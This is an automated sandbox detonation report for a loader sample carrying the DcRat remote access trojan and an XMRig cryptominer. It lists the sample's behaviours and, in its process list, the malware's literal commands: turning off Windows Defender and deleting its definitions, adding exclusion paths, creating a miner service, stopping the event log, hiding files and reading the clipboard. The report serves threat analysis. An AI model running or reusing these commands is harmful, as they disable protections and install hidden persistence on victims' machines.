Analysis Overview
SHA256
7454fcc2c2c9e1b2c9ea16874d70fbfcfdf7823f4ed79d91e6dfbdeadc47d88b
Threat Level: Known bad
The file LunoLoader_pixelplanet.fun.exe was found to be: Known bad.
Malicious Activity Summary
xmrig
Process spawned unexpected child process
Xmrig family
Dcrat family
DcRat
DCRat payload
XMRig Miner payload
Creates new service(s)
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
Stops running service(s)
Clipboard Data
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Obfuscated Files or Information: Command Obfuscation
Power Settings
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
UPX packed file
Hide Artifacts: Hidden Files and Directories
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
System Network Configuration Discovery: Wi-Fi Discovery
System Network Configuration Discovery: Internet Connection Discovery
Unsigned PE
System Location Discovery: System Language Discovery
Browser Information Discovery
Uses Volume Shadow Copy service COM API
Modifies data under HKEY_USERS
Runs ping.exe
Modifies registry class
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Detects videocard installed
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Gathers system information
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-12 18:01
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-12 18:01
Reported
2024-11-12 18:02
Platform
win11-20241007-en
Max time kernel
53s
Max time network
53s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
Xmrig family
xmrig
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Stops running service(s)
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe | N/A |
| N/A | N/A | C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| N/A | N/A | C:\Recovery\WindowsRE\wininit.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI20042\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2844 set thread context of 1392 | N/A | C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe | C:\Windows\system32\conhost.exe |
| PID 2844 set thread context of 1984 | N/A | C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe | C:\Windows\system32\conhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Windows Media Player\fr-FR\5940a34987c991 | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\ebf1f9fa8afd6d | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\loc\System.exe | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\loc\System.exe | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\loc\27d1bcfc3c54e0 | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\fr-FR\OfficeClickToRun.exe | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Windows\fr-FR\e6c9b481da804f | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Windows\CSC\powershell.exe | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\system32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\conhost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings | C:\Recovery\WindowsRE\wininit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\conhost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe
"C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\fK1YYsKuG.vbe"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "XLZQHCLS"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "XLZQHCLS" binpath= "C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "XLZQHCLS"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"
C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe
C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
conhost.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\TPw4JEK.bat" "
C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe
"C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe'
C:\Windows\system32\attrib.exe
